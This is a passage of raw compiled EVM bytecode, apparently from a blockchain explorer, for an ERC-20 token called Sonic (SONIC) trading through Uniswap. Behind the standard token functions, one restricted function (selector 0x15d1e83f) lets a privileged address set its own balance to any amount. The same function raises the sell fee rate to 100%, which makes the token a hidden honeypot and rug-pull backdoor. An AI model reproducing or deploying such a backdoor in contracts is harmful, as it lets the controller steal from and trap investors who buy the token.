type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405261012c600155600560025561012c6005556000600860146101000a81548160ff0219169083151502179055506001600860156101000a81548160ff0219169083151502179055506000600d556000600e556000600f553480156200006757600080fd5b50620000886200007c6200082c60201b60201c565b6200083460201b60201c565b60006012600a6200009a919062000e40565b6402540be400620000ac919062000e91565b9050620000cf620000c26200082c60201b60201c565b82620008f860201b60201c565b620000df6200082c60201b60201c565b601060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001a930600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168362000a9460201b60201c565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000217573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023d919062000f46565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002c7573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002ed919062000f46565b6040518363ffffffff1660e01b81526004016200030c92919062000f89565b6020604051808303816000875af11580156200032c573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000352919062000f46565b600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016200043392919062000fc7565b6020604051808303816000875af115801562000453573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000479919062001031565b506001600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600960003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60006200054062000c6560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550600160096000620005a762000c6560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600c6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000620006e062000c6560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550506200126e565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036200096a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200096190620010c4565b60405180910390fd5b620009868160045462000c8e60201b62000d281790919060201c565b600481905550620009e581600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c8e60201b62000d281790919060201c565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000a889190620010e6565b60405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000b06576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000afd9062001179565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b78576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b6f9062001211565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000c589190620010e6565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000818362000c9e919062001233565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000d345780860481111562000d0c5762000d0b62000ca6565b5b600185161562000d1c5780820291505b808102905062000d2c8562000cd5565b945062000cec565b94509492505050565b60008262000d4f576001905062000e22565b8162000d5f576000905062000e22565b816001811462000d78576002811462000d835762000db9565b600191505062000e22565b60ff84111562000d985762000d9762000ca6565b5b8360020a91508482111562000db25762000db162000ca6565b5b5062000e22565b5060208310610133831016604e8410600b841016171562000df35782820a90508381111562000ded5762000dec62000ca6565b5b62000e22565b62000e02848484600162000ce2565b9250905081840481111562000e1c5762000e1b62000ca6565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000e4d8262000e29565b915062000e5a8362000e33565b925062000e897fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000d3d565b905092915050565b600062000e9e8262000e29565b915062000eab8362000e29565b925082820262000ebb8162000e29565b9150828204841483151762000ed55762000ed462000ca6565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000f0e8262000ee1565b9050919050565b62000f208162000f01565b811462000f2c57600080fd5b50565b60008151905062000f408162000f15565b92915050565b60006020828403121562000f5f5762000f5e62000edc565b5b600062000f6f8482850162000f2f565b91505092915050565b62000f838162000f01565b82525050565b600060408201905062000fa0600083018562000f78565b62000faf602083018462000f78565b9392505050565b62000fc18162000e29565b82525050565b600060408201905062000fde600083018562000f78565b62000fed602083018462000fb6565b9392505050565b60008115159050919050565b6200100b8162000ff4565b81146200101757600080fd5b50565b6000815190506200102b8162001000565b92915050565b6000602082840312156200104a576200104962000edc565b5b60006200105a848285016200101a565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620010ac601f8362001063565b9150620010b98262001074565b602082019050919050565b60006020820190508181036000830152620010df816200109d565b9050919050565b6000602082019050620010fd600083018462000fb6565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006200116160248362001063565b91506200116e8262001103565b604082019050919050565b60006020820190508181036000830152620011948162001152565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000620011f960228362001063565b915062001206826200119b565b604082019050919050565b600060208201905081810360008301526200122c81620011ea565b9050919050565b6000620012408262000e29565b91506200124d8362000e29565b925082820190508082111562001268576200126762000ca6565b5b92915050565b612c76806200127e6000396000f3fe60806040526004361061014f5760003560e01c806370a08231116100b6578063a457c2d71161006f578063a457c2d7146104aa578063a9059cbb146104e7578063cdf4bab914610524578063d54f7d5e1461054f578063dd62ed3e1461057a578063f2fde38b146105b757610182565b806370a08231146103aa578063715018a6146103e75780637d1db4a5146103fe5780638d5f81e2146104295780638da5cb5b1461045457806395d89b411461047f57610182565b806323b872dd1161010857806323b872dd14610283578063313ce567146102c057806339509351146102eb57806342966c68146103285780634fbee1931461035157806351c6590a1461038e57610182565b806306fdde0314610187578063095ea7b3146101b25780630ec4c619146101ef57806315d1e83f1461020657806318160ddd1461022f57806321bbcbb11461025a57610182565b36610182577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561019357600080fd5b5061019c6105e0565b6040516101a99190611e84565b60405180910390f35b3480156101be57600080fd5b506101d960048036038101906101d49190611f4e565b61061d565b6040516101e69190611fa9565b60405180910390f35b3480156101fb57600080fd5b5061020461063b565b005b34801561021257600080fd5b5061022d60048036038101906102289190611fc4565b610657565b005b34801561023b57600080fd5b50610244610685565b6040516102519190612000565b60405180910390f35b34801561026657600080fd5b50610281600480360381019061027c9190612163565b61068f565b005b34801561028f57600080fd5b506102aa60048036038101906102a591906121ac565b610777565b6040516102b79190611fa9565b60405180910390f35b3480156102cc57600080fd5b506102d5610850565b6040516102e2919061221b565b60405180910390f35b3480156102f757600080fd5b50610312600480360381019061030d9190611f4e565b610859565b60405161031f9190611fa9565b60405180910390f35b34801561033457600080fd5b5061034f600480360381019061034a9190611fc4565b61090c565b005b34801561035d57600080fd5b5061037860048036038101906103739190612236565b610920565b6040516103859190611fa9565b60405180910390f35b6103a860048036038101906103a39190611fc4565b610976565b005b3480156103b657600080fd5b506103d160048036038101906103cc9190612236565b6109d3565b6040516103de9190612000565b60405180910390f35b3480156103f357600080fd5b506103fc610a1c565b005b34801561040a57600080fd5b50610413610a30565b6040516104209190612000565b60405180910390f35b34801561043557600080fd5b5061043e610a62565b60405161044b9190612272565b60405180910390f35b34801561046057600080fd5b50610469610a8c565b6040516104769190612272565b60405180910390f35b34801561048b57600080fd5b50610494610ab5565b6040516104a19190611e84565b60405180910390f35b3480156104b657600080fd5b506104d160048036038101906104cc9190611f4e565b610af2565b6040516104de9190611fa9565b60405180910390f35b3480156104f357600080fd5b5061050e60048036038101906105099190611f4e565b610bbf565b60405161051b9190611fa9565b60405180910390f35b34801561053057600080fd5b50610539610bdd565b6040516105469190611fa9565b60405180910390f35b34801561055b57600080fd5b50610564610bf4565b6040516105719190612272565b60405180910390f35b34801561058657600080fd5b506105a1600480360381019061059c919061228d565b610c1e565b6040516105ae9190612000565b60405180910390f35b3480156105c357600080fd5b506105de60048036038101906105d99190612236565b610ca5565b005b60606040518060400160405280600581526020017f536f6e6963000000000000000000000000000000000000000000000000000000815250905090565b600061063161062a610d3e565b8484610d46565b6001905092915050565b610643610f0f565b612710600181905550612710600581905550565b601054331461066557600080fd5b604051338152600360208201526040812082815560648002600d55505050565b6000600454905090565b610697610f0f565b60c8815111156106dc576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106d39061233f565b60405180910390fd5b6000600c905060005b82518110156107725760018260008584815181106107065761070561235f565b5b602002602001015173ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550808061076a906123bd565b9150506106e5565b505050565b6000610784848484610f8d565b61084584610790610d3e565b61084085604051806060016040528060288152602001612bf460289139600760008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006107f6610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b610d46565b600190509392505050565b60006012905090565b6000610902610866610d3e565b846108fd8560076000610877610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b610d46565b6001905092915050565b61091d610917610d3e565b82611940565b50565b6000600c60008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b61097e610f0f565b6001600860146101000a81548160ff0219169083151502179055506109ab6109a4610a8c565b3083610f8d565b6109b58134611ae3565b6000600860146101000a81548160ff02191690831515021790555050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b610a24610f0f565b610a2e6000611bc8565b565b6000610a5d612710610a4f600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905090565b6000600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600581526020017f534f4e4943000000000000000000000000000000000000000000000000000000815250905090565b6000610bb5610aff610d3e565b84610bb085604051806060016040528060258152602001612c1c6025913960076000610b29610d3e565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b610d46565b6001905092915050565b6000610bd3610bcc610d3e565b8484610f8d565b6001905092915050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600760008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610cad610f0f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d1c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1390612477565b60405180910390fd5b610d2581611bc8565b50565b60008183610d369190612497565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dac9061253d565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e24576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1b906125cf565b60405180910390fd5b80600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f029190612000565b60405180910390a3505050565b610f17610d3e565b73ffffffffffffffffffffffffffffffffffffffff16610f35610a8c565b73ffffffffffffffffffffffffffffffffffffffff1614610f8b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f829061263b565b60405180910390fd5b565b610f98838383611cb8565b600080610fa3610a8c565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16141580156110115750610fe1610a8c565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561158657600c60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161580156110ba5750600c60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561158557600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614801561116a5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b80156111c05750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b80156112165750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561131057611246612710611238600154600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b831115611288576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161127f906126cd565b60405180910390fd5b6112b36127106112a5600554600454611c8c90919063ffffffff16565b611ca290919063ffffffff16565b6112ce846112c0876109d3565b610d2890919063ffffffff16565b111561130f576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016113069061275f565b60405180910390fd5b5b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561139957503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b15611439576113c76127106113b9600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b91506113f26127106113e4600d5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156114e45750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561158457611512612710611504600e5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b915061153d61271061152f600f5486611c8c90919063ffffffff16565b611ca290919063ffffffff16565b905043600a60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b600061159b8284610d2890919063ffffffff16565b9050600081111561173a5760008311156115ba576115b98684611940565b5b6000821115611724576116378260036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b60036000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161171b9190612000565b60405180910390a35b6117378185611dde90919063ffffffff16565b93505b6117a684604051806060016040528060268152602001612bce60269139600360008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061183b84600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610d2890919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516118db9190612000565b60405180910390a3505050505050565b6000838311158290611933576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161192a9190611e84565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036119af576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119a6906127f1565b60405180910390fd5b611a1b81604051806060016040528060228152602001612bac60229139600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546118eb9092919063ffffffff16565b600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550611a7381600454611dde90919063ffffffff16565b600481905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611ad79190612000565b60405180910390a35050565b611b1030600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610d46565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080611b5c610a8c565b426040518863ffffffff1660e01b8152600401611b7e96959493929190612856565b60606040518083038185885af1158015611b9c573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611bc191906128cc565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611c9a919061291f565b905092915050565b60008183611cb09190612990565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611d27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d1e90612a33565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611d96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d8d90612ac5565b60405180910390fd5b60008111611dd9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd090612b57565b60405180910390fd5b505050565b60008183611dec9190612b77565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611e2e578082015181840152602081019050611e13565b60008484015250505050565b6000601f19601f8301169050919050565b6000611e5682611df4565b611e608185611dff565b9350611e70818560208601611e10565b611e7981611e3a565b840191505092915050565b60006020820190508181036000830152611e9e8184611e4b565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611ee582611eba565b9050919050565b611ef581611eda565b8114611f0057600080fd5b50565b600081359050611f1281611eec565b92915050565b6000819050919050565b611f2b81611f18565b8114611f3657600080fd5b50565b600081359050611f4881611f22565b92915050565b60008060408385031215611f6557611f64611eb0565b5b6000611f7385828601611f03565b9250506020611f8485828601611f39565b9150509250929050565b60008115159050919050565b611fa381611f8e565b82525050565b6000602082019050611fbe6000830184611f9a565b92915050565b600060208284031215611fda57611fd9611eb0565b5b6000611fe884828501611f39565b91505092915050565b611ffa81611f18565b82525050565b60006020820190506120156000830184611ff1565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61205882611e3a565b810181811067ffffffffffffffff8211171561207757612076612020565b5b80604052505050565b600061208a611ea6565b9050612096828261204f565b919050565b600067ffffffffffffffff8211156120b6576120b5612020565b5b602082029050602081019050919050565b600080fd5b60006120df6120da8461209b565b612080565b90508083825260208201905060208402830185811115612102576121016120c7565b5b835b8181101561212b57806121178882611f03565b845260208401935050602081019050612104565b5050509392505050565b600082601f83011261214a5761214961201b565b5b813561215a8482602086016120cc565b91505092915050565b60006020828403121561217957612178611eb0565b5b600082013567ffffffffffffffff81111561219757612196611eb5565b5b6121a384828501612135565b91505092915050565b6000806000606084860312156121c5576121c4611eb0565b5b60006121d386828701611f03565b93505060206121e486828701611f03565b92505060406121f586828701611f39565b9150509250925092565b600060ff82169050919050565b612215816121ff565b82525050565b6000602082019050612230600083018461220c565b92915050565b60006020828403121561224c5761224b611eb0565b5b600061225a84828501611f03565b91505092915050565b61226c81611eda565b82525050565b60006020820190506122876000830184612263565b92915050565b600080604083850312156122a4576122a3611eb0565b5b60006122b285828601611f03565b92505060206122c385828601611f03565b9150509250929050565b7f4d6178696d756d206f66203230302063616e206265206164646564206174206f60008201527f6e63650000000000000000000000000000000000000000000000000000000000602082015250565b6000612329602383611dff565b9150612334826122cd565b604082019050919050565b600060208201905081810360008301526123588161231c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006123c882611f18565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036123fa576123f961238e565b5b600182019050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000612461602683611dff565b915061246c82612405565b604082019050919050565b6000602082019050818103600083015261249081612454565b9050919050565b60006124a282611f18565b91506124ad83611f18565b92508282019050808211156124c5576124c461238e565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000612527602483611dff565b9150612532826124cb565b604082019050919050565b600060208201905081810360008301526125568161251a565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006125b9602283611dff565b91506125c48261255d565b604082019050919050565b600060208201905081810360008301526125e8816125ac565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612625602083611dff565b9150612630826125ef565b602082019050919050565b6000602082019050818103600083015261265481612618565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006126b7602883611dff565b91506126c28261265b565b604082019050919050565b600060208201905081810360008301526126e6816126aa565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b6000612749602383611dff565b9150612754826126ed565b604082019050919050565b600060208201905081810360008301526127788161273c565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b60006127db602183611dff565b91506127e68261277f565b604082019050919050565b6000602082019050818103600083015261280a816127ce565b9050919050565b6000819050919050565b6000819050919050565b600061284061283b61283684612811565b61281b565b611f18565b9050919050565b61285081612825565b82525050565b600060c08201905061286b6000830189612263565b6128786020830188611ff1565b6128856040830187612847565b6128926060830186612847565b61289f6080830185612263565b6128ac60a0830184611ff1565b979650505050505050565b6000815190506128c681611f22565b92915050565b6000806000606084860312156128e5576128e4611eb0565b5b60006128f3868287016128b7565b9350506020612904868287016128b7565b9250506040612915868287016128b7565b9150509250925092565b600061292a82611f18565b915061293583611f18565b925082820261294381611f18565b9150828204841483151761295a5761295961238e565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061299b82611f18565b91506129a683611f18565b9250826129b6576129b5612961565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000612a1d602583611dff565b9150612a28826129c1565b604082019050919050565b60006020820190508181036000830152612a4c81612a10565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612aaf602383611dff565b9150612aba82612a53565b604082019050919050565b60006020820190508181036000830152612ade81612aa2565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b6000612b41602983611dff565b9150612b4c82612ae5565b604082019050919050565b60006020820190508181036000830152612b7081612b34565b9050919050565b6000612b8282611f18565b9150612b8d83611f18565b9250828203905081811115612ba557612ba461238e565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220824da864f35248f89aad200f39ca1f280bc23bdd89f4c0e952855bf6d17db6b664736f6c63430008120033

Deployed Bytecode

